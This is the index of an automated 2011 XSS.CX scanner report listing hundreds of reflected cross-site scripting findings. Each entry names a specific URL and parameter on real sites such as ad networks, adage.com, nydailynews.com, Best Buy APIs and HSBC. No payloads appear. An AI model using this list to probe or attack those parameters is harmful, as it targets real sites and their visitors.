XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10052011-03

Report generated by XSS.CX at Wed Oct 05 10:34:16 CDT 2011.


1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [REST URL parameter 2]

1.2. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [REST URL parameter 3]

1.3. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [name of an arbitrarily supplied request parameter]

1.4. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [sz parameter]

1.5. http://a.collective-media.net/cmadj/ns.informit/homepage [REST URL parameter 2]

1.6. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 1]

1.7. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 2]

1.8. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 3]

1.9. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [sz parameter]

1.10. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [dcove parameter]

1.11. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [key parameter]

1.12. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [message parameter]

1.13. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [redirectURL parameter]

1.14. http://ad.turn.com/server/pixel.htm [fpid parameter]

1.15. http://ad.turn.com/server/pixel.htm [sp parameter]

1.16. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 1]

1.17. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 2]

1.18. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 3]

1.19. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 1]

1.20. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 2]

1.21. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 3]

1.22. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 1]

1.23. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 2]

1.24. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 3]

1.25. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 1]

1.26. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 2]

1.27. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 3]

1.28. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 1]

1.29. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 2]

1.30. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 3]

1.31. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 1]

1.32. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 2]

1.33. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 3]

1.34. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 1]

1.35. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 2]

1.36. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 3]

1.37. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 1]

1.38. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 2]

1.39. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 3]

1.40. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 1]

1.41. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 2]

1.42. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 3]

1.43. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 1]

1.44. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 2]

1.45. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 3]

1.46. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 1]

1.47. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 2]

1.48. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 3]

1.49. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 1]

1.50. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 2]

1.51. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 3]

1.52. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 1]

1.53. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 2]

1.54. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 3]

1.55. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 1]

1.56. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 2]

1.57. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 3]

1.58. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 1]

1.59. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 2]

1.60. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 3]

1.61. http://adage.com/ajax/get_comments.php [REST URL parameter 1]

1.62. http://adage.com/ajax/get_comments.php [REST URL parameter 2]

1.63. http://adage.com/ajax/get_comments.php [article_id parameter]

1.64. http://adage.com/ajax/get_comments.php [name of an arbitrarily supplied request parameter]

1.65. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [REST URL parameter 1]

1.66. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [REST URL parameter 4]

1.67. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [name of an arbitrarily supplied request parameter]

1.68. http://adage.com/css/style.css [REST URL parameter 1]

1.69. http://adage.com/css/style.css [REST URL parameter 2]

1.70. http://adage.com/favicon.ico [REST URL parameter 1]

1.71. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 1]

1.72. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 2]

1.73. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 3]

1.74. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 4]

1.75. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 5]

1.76. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 1]

1.77. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 2]

1.78. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 3]

1.79. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 4]

1.80. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 5]

1.81. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 1]

1.82. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 2]

1.83. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 3]

1.84. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 4]

1.85. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 5]

1.86. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 1]

1.87. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 2]

1.88. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 3]

1.89. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 4]

1.90. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 1]

1.91. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 2]

1.92. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 3]

1.93. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 4]

1.94. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 1]

1.95. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 2]

1.96. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 3]

1.97. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 4]

1.98. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 1]

1.99. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 2]

1.100. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 3]

1.101. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 4]

1.102. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 1]

1.103. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 2]

1.104. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 3]

1.105. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 4]

1.106. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 1]

1.107. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 2]

1.108. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 3]

1.109. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 4]

1.110. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 1]

1.111. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 2]

1.112. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 3]

1.113. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 4]

1.114. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 1]

1.115. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 2]

1.116. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 3]

1.117. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 4]

1.118. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 1]

1.119. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 2]

1.120. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 3]

1.121. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 4]

1.122. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 1]

1.123. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 2]

1.124. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 3]

1.125. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 1]

1.126. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 2]

1.127. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 3]

1.128. http://adage.com/images/rss.gif [REST URL parameter 1]

1.129. http://adage.com/images/rss.gif [REST URL parameter 2]

1.130. http://adage.com/scripts/aa-jquery.js [REST URL parameter 1]

1.131. http://adage.com/scripts/aa-jquery.js [REST URL parameter 2]

1.132. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 1]

1.133. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 2]

1.134. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 3]

1.135. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 1]

1.136. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 2]

1.137. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 3]

1.138. http://adage.com/scripts/javascript.js [REST URL parameter 1]

1.139. http://adage.com/scripts/javascript.js [REST URL parameter 2]

1.140. http://adage.com/scripts/jquery.easing.1.3.js [REST URL parameter 1]

1.141. http://adage.com/scripts/jquery.easing.1.3.js [REST URL parameter 2]

1.142. http://adage.com/scripts/jquery.onefblikev1.1.js [REST URL parameter 1]

1.143. http://adage.com/scripts/jquery.onefblikev1.1.js [REST URL parameter 2]

1.144. http://adage.com/scripts/jquery.onefblikev1.2.js [REST URL parameter 1]

1.145. http://adage.com/scripts/jquery.onefblikev1.2.js [REST URL parameter 2]

1.146. http://adage.com/scripts/lib.js [REST URL parameter 1]

1.147. http://adage.com/scripts/lib.js [REST URL parameter 2]

1.148. http://adage.com/scripts/sniff.js [REST URL parameter 1]

1.149. http://adage.com/scripts/sniff.js [REST URL parameter 2]

1.150. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

1.151. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

1.152. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

1.153. http://admeld.adnxs.com/usersync [admeld_callback parameter]

1.154. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

1.155. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

1.156. http://adsfac.us/ag.asp [cc parameter]

1.157. http://api.active.com/REST/ZipDma/zip/75244 [callback parameter]

1.158. http://api.active.com/REST/geotargeting/handler.ashx [callback parameter]

1.159. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 1]

1.160. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 2]

1.161. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [callback parameter]

1.162. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [name of an arbitrarily supplied request parameter]

1.163. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [pageSize parameter]

1.164. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [show parameter]

1.165. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 1]

1.166. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 2]

1.167. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [callback parameter]

1.168. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [name of an arbitrarily supplied request parameter]

1.169. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [pageSize parameter]

1.170. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [show parameter]

1.171. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

1.172. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

1.173. http://api.demandbase.com/api/v2/ip.js [var parameter]

1.174. http://api.viglink.com/api/ping [REST URL parameter 2]

1.175. http://api.viglink.com/api/ping [jsonp parameter]

1.176. http://assets.nydailynews.com/favicon.ico [REST URL parameter 1]

1.177. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 1]

1.178. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 2]

1.179. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 3]

1.180. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 4]

1.181. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 5]

1.182. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 1]

1.183. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 2]

1.184. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 3]

1.185. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 4]

1.186. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 5]

1.187. http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 1]

1.188. http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 2]

1.189. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.190. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.191. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.192. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.193. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.194. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.195. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.196. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.197. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [REST URL parameter 3]

1.198. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callback parameter]

1.199. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callbackArgument parameter]

1.200. http://bid.openx.net/json [c parameter]

1.201. http://brocade.netshelter.net/fixed_placement.js.php [name of an arbitrarily supplied request parameter]

1.202. http://brocade.netshelter.net/fixed_placement.js.php [publisher parameter]

1.203. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

1.204. http://cdn.widgetserver.com/syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/ [REST URL parameter 14]

1.205. http://cdn.widgetserver.com/syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/ [REST URL parameter 4]

1.206. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

1.207. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

1.208. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

1.209. http://content.atomz.com/autocomplete/sp10/04/3b/7b/ [callback parameter]

1.210. http://content.bestbuyon.com/solr/select/ [callback parameter]

1.211. http://content.bestbuyon.com/solr/select/ [fl parameter]

1.212. http://content.bestbuyon.com/solr/select/ [indent parameter]

1.213. http://content.bestbuyon.com/solr/select/ [json.wrf parameter]

1.214. http://content.bestbuyon.com/solr/select/ [name of an arbitrarily supplied request parameter]

1.215. http://content.bestbuyon.com/solr/select/ [q parameter]

1.216. http://crm.rightnow.com/app/utils/simple_create_account/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php [REST URL parameter 5]

1.217. http://crm.rightnow.com/app/utils/simple_login_form/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php [REST URL parameter 5]

1.218. http://drh.img.digitalriver.com/DRHM/store [Action parameter]

1.219. http://drh.img.digitalriver.com/store [Action parameter]

1.220. http://ebay.adnxs.com/ttj [pt1 parameter]

1.221. http://ebay.adnxs.com/ttj [pt2 parameter]

1.222. http://ebay.adnxs.com/ttj [pt3 parameter]

1.223. http://events.nydailynews.com/json [jsonsp parameter]

1.224. http://events.nydailynews.com/json [st parameter]

1.225. http://events.nydailynews.com/partner_json/search [image_size parameter]

1.226. http://events.nydailynews.com/partner_json/search [jsonsp parameter]

1.227. http://events.nydailynews.com/partner_json/search [st parameter]

1.228. http://events.nydailynews.com/partner_json/search [when parameter]

1.229. http://exacttarget.tt.omtrdc.net/m2/exacttarget/mbox/standard [mbox parameter]

1.230. http://feeds.delicious.com/v2/js/awsbuzz [count parameter]

1.231. http://feeds.delicious.com/v2/js/awsbuzz [icon parameter]

1.232. http://feeds.delicious.com/v2/js/awsbuzz [name of an arbitrarily supplied request parameter]

1.233. http://feeds.delicious.com/v2/js/awsbuzz [sort parameter]

1.234. http://feeds.delicious.com/v2/js/awsbuzz [title parameter]

1.235. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 2]

1.236. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 3]

1.237. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 4]

1.238. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 5]

1.239. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 6]

1.240. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 7]

1.241. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [name of an arbitrarily supplied request parameter]

1.242. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [sz parameter]

1.243. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 2]

1.244. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 3]

1.245. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 4]

1.246. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 5]

1.247. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [aid parameter]

1.248. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [c parameter]

1.249. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [cid parameter]

1.250. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [h parameter]

1.251. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [js parameter]

1.252. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [name of an arbitrarily supplied request parameter]

1.253. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [pid parameter]

1.254. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [plc parameter]

1.255. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [w parameter]

1.256. http://ib.adnxs.com/ptj [redir parameter]

1.257. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [imp_rvr_id parameter]

1.258. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpck parameter]

1.259. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpvc parameter]

1.260. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [imp_rvr_id parameter]

1.261. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpck parameter]

1.262. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpvc parameter]

1.263. http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2]

1.264. http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2]

1.265. http://intensedebate.com/remoteVisit.php [REST URL parameter 1]

1.266. http://interface.q-go.net/rightnow/index.php [q parameter]

1.267. http://ips-invite.iperceptions.com/webValidator.aspx [cD parameter]

1.268. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]

1.269. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]

1.270. http://js.revsci.net/gateway/gw.js [csid parameter]

1.271. http://mads.techrepublic.com/mac-ad [ADREQ&beacon parameter]

1.272. http://mads.techrepublic.com/mac-ad [PAGESTATE parameter]

1.273. http://mads.techrepublic.com/mac-ad [SITE parameter]

1.274. http://ndparking.com/serve.php [REST URL parameter 1]

1.275. http://ndparking.com/serve.php [dn parameter]

1.276. http://ndparking.com/serve.php [name of an arbitrarily supplied request parameter]

1.277. http://oee.sandals.com/includes/calendar/formCalendar.cfm [targetRow parameter]

1.278. http://oee.sandals.com/includes/calendar/formCalendar.cfm [the_field parameter]

1.279. http://orders.allmenus.com/content/dfp.asp [position parameter]

1.280. http://origin.collective-media.net/adj/ns.informit/homepage [REST URL parameter 2]

1.281. http://origin.collective-media.net/adj/ns.informit/homepage [REST URL parameter 3]

1.282. http://origin.collective-media.net/adj/ns.informit/homepage [name of an arbitrarily supplied request parameter]

1.283. http://origin.collective-media.net/adj/ns.informit/homepage [ppos parameter]

1.284. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5461951393721719569 [hl parameter]

1.285. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5461951393721719569 [kind parameter]

1.286. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5547732855143429377 [hl parameter]

1.287. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5547732855143429377 [kind parameter]

1.288. http://pixel.adsafeprotected.com/jspix [anId parameter]

1.289. http://pixel.adsafeprotected.com/jspix [campId parameter]

1.290. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

1.291. http://pixel.adsafeprotected.com/jspix [pubId parameter]

1.292. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

1.293. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.294. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

1.295. http://r.turn.com/server/pixel.htm [fpid parameter]

1.296. http://r.turn.com/server/pixel.htm [sp parameter]

1.297. http://rbisaleschallenge.wpunj.edu/home/assets/player.swf [REST URL parameter 1]

1.298. http://rbisaleschallenge.wpunj.edu/home/assets/player.swf [REST URL parameter 2]

1.299. http://rbisaleschallenge.wpunj.edu/home/assets/player.swf [REST URL parameter 3]

1.300. http://rbisaleschallenge.wpunj.edu/home/assets/playlist.xml [REST URL parameter 1]

1.301. http://rbisaleschallenge.wpunj.edu/home/assets/playlist.xml [REST URL parameter 2]

1.302. http://rbisaleschallenge.wpunj.edu/home/assets/playlist.xml [REST URL parameter 3]

1.303. http://realtime.active.com/widget/active_home [callback parameter]

1.304. http://restaurants.nydailynews.com/geocode/ [addressfull parameter]

1.305. http://rok.com.com/rok-get [app_handle parameter]

1.306. http://rok.com.com/rok-get [name of an arbitrarily supplied request parameter]

1.307. http://rok.com.com/rok-get [site parameter]

1.308. http://rok.com.com/rok-get [unit_sp parameter]

1.309. http://s25.sitemeter.com/js/counter.asp [site parameter]

1.310. http://s25.sitemeter.com/js/counter.js [site parameter]

1.311. http://services.digg.com/1.0/endpoint [callback parameter]

1.312. http://services.digg.com/1.0/endpoint [method parameter]

1.313. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]

1.314. http://services.digg.com/1.0/endpoint [type parameter]

1.315. http://wd.sharethis.com/api/getCount2.php [cb parameter]

1.316. http://widgets.active.com/widgets/nearyou/search [cb parameter]

1.317. http://widgets.digg.com/buttons/count [url parameter]

1.318. http://www.businesswire.com/news/home/20110606006390/en/eBay-Agrees-Acquire-Magento [REST URL parameter 3]

1.319. http://www.businesswire.com/news/home/20110606006390/en/eBay-Agrees-Acquire-Magento [REST URL parameter 4]

1.320. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.hidden_rf parameter]

1.321. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.peopletravelling parameter]

1.322. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_children parameter]

1.323. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_rf parameter]

